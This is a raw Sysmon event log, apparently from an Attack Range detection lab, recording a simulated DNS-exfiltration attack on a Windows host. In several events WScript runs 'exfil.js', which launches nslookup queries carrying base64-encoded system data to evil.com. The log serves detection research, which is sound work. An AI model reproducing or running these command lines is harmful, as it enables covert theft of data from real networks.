14:21:28.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.459{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2743-000000005F02}7888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.459{2E1864BB-18E0-629A-6742-000000005F02}39765432C:\Windows\System32\WScript.exe{2E1864BB-18E8-629A-2743-000000005F02}7888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.471{2E1864BB-18E8-629A-2743-000000005F02}7888C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltgxobw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.459{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvergcf.tmpMD5=2F8701F387AF2110E32408D0F4A242C3,SHA256=6A2A0ACD9892C9D73119665C3163E4FB9119D009FEA0026931DDF4E05E5C0E6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000207783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.459{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9516107038D56D88BA0774A37A17DF55,SHA256=4AD0FC47B8F63BC36FEFEB66A6034AC72823BE811A88EDCA400B0DC0DCE41C28,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.444{2E1864BB-18E8-629A-2543-000000005F02}32126004C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-2643-000000005F02}6932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.444{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2643-000000005F02}6932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.444{2E1864BB-18E8-629A-2443-000000005F02}75521044C:\Windows\system32\cmd.exe{2E1864BB-18E8-629A-2643-000000005F02}6932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.444{2E1864BB-18E8-629A-2643-000000005F02}6932C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E8-629A-2443-000000005F02}7552C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvergcf.tmp 2>&1 10341000x8000000000000000207774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.413{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-2543-000000005F02}3212C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.413{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-2543-000000005F02}3212C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.413{2E1864BB-18E8-629A-2543-000000005F02}32126004C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-2443-000000005F02}7552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.397{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2543-000000005F02}3212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.397{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2443-000000005F02}7552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.397{2E1864BB-18E0-629A-6742-000000005F02}39764204C:\Windows\System32\WScript.exe{2E1864BB-18E8-629A-2443-000000005F02}7552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.402{2E1864BB-18E8-629A-2443-000000005F02}7552C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvergcf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.381{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnlhk.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.359{2E1864BB-18E8-629A-2243-000000005F02}55847564C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-2343-000000005F02}7304C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.359{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.359{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.359{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 